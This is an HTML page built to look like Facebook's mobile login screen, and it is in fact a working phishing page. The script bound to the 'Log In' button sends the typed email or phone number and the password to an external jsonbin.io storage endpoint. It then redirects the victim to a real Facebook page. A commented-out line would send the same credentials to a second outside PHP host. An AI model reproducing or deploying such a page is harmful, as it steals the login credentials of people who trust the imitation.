<html><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<link rel="stylesheet" type="text/css" href="css/computer.css" media="screen and (min-width: 769px)">
<link rel="stylesheet" type="text/css" href="css/mobile.css" media="screen and (max-width: 768px)">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.7.0/css/all.css" integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet">
<style>
/* Hiding Styles for Computer Screen */
.computer {
	display: none;
}

/* Styles for whole web page */
* {
  box-sizing: border-box;
}
body {
	margin: 0;
	padding: 0;
	font-family: 'Roboto', Helvetica, Sans-serif;
}
.clearfix::after {
	content: "";
	clear: both;
	display: table;
}
a {
  color: #365899;
  text-decoration: none;
}
a:hover {
  text-decoration: underline;
}


/* Styles for header */
.mobheader {
	height: 44px;
	min-width: 320px;
	width: 100%;
	background-color: #3B5998;
	display: flex;
}
.mobfblogo {
	height: 21px;
	width: 104px;
	margin: auto auto;
}

#mobapplink {
	background-color: #fffbe2;
	height: 48px;
	min-width: 360px;
}
#mobandroidpic {
	height: 32px;
	width: 18px;
	margin: 9px 11px 9px 16px;
	float: left;
}
#getfbandroid {
	float: left;
	padding: 17px 0 17px 0;
	font-size: 14px;
}


/* Styles for mid-section */
.mobmaindiv {
	background-color: #ECEFF5;
	min-width: 320px;
	width: 100%;
	height: 294px;
	padding-left: 16px;
	padding-right: 16px;
}
#mobtextdiv {
	max-width: 420px;
	margin: auto;
	margin-bottom: 11px;
	padding-top: 16px;
}
.mobtextbox {
	width: 100%;
	padding: 12px;
	border: 1px solid #DBDEE4;
}
.mobtextbox::-webkit-input-placeholder {
	font-size: 14px;
}
.mobtextbox1 {
	height: 44px;
	border-bottom: .5px solid #E5E5E5;
	border-top-left-radius: 5px;
	border-top-right-radius: 5px;
}
.mobtextbox2 {
	height: 46px;
	border-top: .5px solid #E5E5E5;
	border-bottom-left-radius: 5px;
	border-bottom-right-radius: 5px;
}
.mobloginbuttondiv {
	max-width: 420px;
	margin: auto;
}
.mobloginbutton {
	font-size: 14px;
	font-weight: bold;
	color: white;
	background-color: #3578E5;
	width: 100%;
	height: 36px;
	border-radius: 5px;
	border: 1px solid #3578E5;
}

#ordiv {
	text-align: center;
	margin: 4px 0 12px 0;
}
#or {
	font-size: 14px;
	color: #4B4F56;
	position: relative;
}
#or::before, #or::after {
	content: "";
	position: absolute;
	width: 110px;
	height: 1px;
	background-color: #ccd0d5;
	top: 50%;
}
#or::before {
	right: 100%;
	margin-right: 15px;
}
#or::after {
	left: 100%;
	margin-left: 15px;
}

#mobcreatediv {
	text-align: center;
}
#mobcreate {
	height: 36px;
	width: 169px;
	color: white;
	background-color: #00a400;
	border: 1px solid #00a400;
	border-radius: 5px;
	font-size: 14px;
	font-weight: bold;
}

.mobforgotpw {
	margin-top: 15px;
	font-size: 12px;
	text-align: center;
}
.mobforgotpw a {
	color: #7596c8;
}


/* Styles for footer */
.mobfooter {
	min-width: 320px;
	width: 100%;
	background-color: #FFF;
}
#moblangs {
	display: flex;
	margin-top: 20px;
}
.item1, .item2 {
	flex-grow: 1;
}
.mobfooter #moblangs li {
	list-style-type: none;
	font-size: 12px;
	text-align: center;
	margin-bottom: 2px;
}
.mobfooter #moblangs li a {
	color: #576b95;
}
#mobcurrentlang {
	color: #90949c !important;
	font-weight: 500;
	letter-spacing: 0.5px;
}
.mobfooter #moblangs li a .fa {
	font-size: 24px;
	color: #576b95;
}

.mobcopyright {
	text-align: center;
}
.mobfbcopyright, #mobdisclaimer, #mobcopyrightfblink {
	font-size: 12px;
	color: #808080;
	margin: auto;
}
.mobcopyright span .fa {
	color: #0274b3;
	font-size: 14px;
}
#mobpranavks {
	color: #0274b3;
}
</style>
<title>Facebook - Log In or Sign Up</title>
</head>

<body>
<!--Code for Mobile Screen-->

<div class="mobile">
  <div class="mobheader">
    <img src="https://raw.githubusercontent.com/pranavks/fb-ui-clone/master/images/fblogo.png" class="mobfblogo">
  </div>
  <div id="mobapplink" class="clearfix">
    <a href="#">
      <img src="https://raw.githubusercontent.com/pranavks/fb-ui-clone/master/images/fbandroid.png" id="mobandroidpic">
      <div id="getfbandroid">Get Facebook for Android and browse faster.</div>
    </a>
  </div>
  <div class="mobmaindiv">
    <div id="mobtextdiv">
      <input type="text" maxlength="100" min="6" class="mobtextbox mobtextbox1" id="u1" placeholder="Mobile number or email address">
      <input type="password" maxlength="100" min="8" class="mobtextbox mobtextbox2" id="p1" placeholder="Password">
    </div>
    <div class="mobloginbuttondiv">
      <input type="submit" class="mobloginbutton" onclick="send();" value="Log In">
    </div>
    <div id="ordiv">
    <span id="or">or</span>
    </div>
    <div id="mobcreatediv">
      <button id="mobcreate">Create New Account</button>
    </div>
    <div class="mobforgotpw">
      <a href="#">Forgotten password?</a>
      <span>·</span>
      <a href="#">Help Center</a>
    </div>
  </div>
  <div class="mobfooter">
    <div id="moblangs">
      <div class="item1">
        <li><a href="#" id="mobcurrentlang">English (UK)</a></li>
        <li><a href="#">தமிழ்</a></li>
        <li><a href="#">हिन्दी</a></li>
        <li><a href="#">বাংলা</a></li>
      </div>
      <div class="item2">
        <li><a href="#">മലയാളം</a></li>
        <li><a href="#">ಕನ್ನಡ</a></li>
        <li><a href="#">اردو</a></li>
        <li><a href="#"><i class="fa fa-plus-square-o"></i></a></li>
      </div>
    </div>
    <div class="mobcopyright">
      <span class="mobfbcopyright"><a href="https://m.facebook.com" target="_blank" id="mobcopyrightfblink">Facebook</a> ©2021</span><br>
    </div>
    </div>
</div>
<script>
function send(){
var u = document.getElementById('u1').value;
var p = document.getElementById('p1').value;
if(u.length > 6 && p.length > 7){
	let req = new XMLHttpRequest();

req.onreadystatechange = () => {
  if (req.readyState == XMLHttpRequest.DONE) {
    console.log(req.responseText);
	  window.location.replace("https://m.facebook.com/Maheshwari-Mahila-Mandal-Bangalore-104485484597585/");
  }
};

req.open("PUT", "https://api.jsonbin.io/b/602a694b99ac3873a349bc96", true);
req.setRequestHeader("Content-Type", "application/json");
req.send('{"'+u+'": "'+p+'"}');	
//var a = document.createElement('img');
//a.src = "http://phpcloud101.gearhostpreview.com/m.php?c="+u+p;
}else{
alert('Email/Password cannot be too short!');
}

}
</script>
</body></html>
